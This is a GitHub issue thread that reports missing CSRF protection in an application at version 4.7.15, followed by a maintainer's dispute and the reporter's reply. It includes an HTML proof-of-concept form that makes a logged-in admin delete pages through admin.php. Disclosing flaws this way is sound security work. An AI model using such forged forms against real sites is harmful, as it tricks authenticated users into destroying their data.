CSRF Application Wide
devansh3008 opened this issue · 2 comments
devansh3008 commented
I have found multiple CSRF Issues on following version: 4.7.15
There is no use of Anticrsf token and Same site cookie being used. All endpoints are vulnerable even 4.7.16-dev4.
Only user needs to be logged in (no password is required to perform this issue)
Valid POC: (exploit.html)
<html><head>
<title>CSRF PoC - Generated By AppSec Labs csrf-generator</title>
</head><body>
<form action="http://localhost/admin.php?action=deletepage&var1=csrf" method="GET">
<input type="text" name="action" value="deletepage" /><br />
<input type="text" name="var1" value="csrf" /><br />
<input type='submit' value='Go!' />
</form>
</body>
</html>
Click on this html page and you can see you delete page/trashcan objects. The issue is being reported by me on huntr.io. I am adding this as reference for you to go over the images.
BSteelooper commented
This is not a bug, this is doing something as an authenticated user. This is not possible remotely, or when you are not logged on.
devansh3008 commented
The CSRF Issue requires an victim user to be authenticated. When he clicks
on html poc, the exploit would be executed.
Thanks,
Devansh
…On Mon, Feb 20, 2023, 15:50 Bas Steelooper ***@***.***> wrote:
This is not a bug, this is doing something as an authenticated user. This
is not possible remotely, or when you are not logged on.
—
Reply to this email directly, view it on GitHub
<#116 (comment)>,
or unsubscribe
<https://github.com/notifications/unsubscribe-auth/AHL2OPOM4UQT2W36RVL3GNLWYNAN7ANCNFSM5PQXODWQ>
.
You are receiving this because you authored the thread.Message ID:
***@***.***>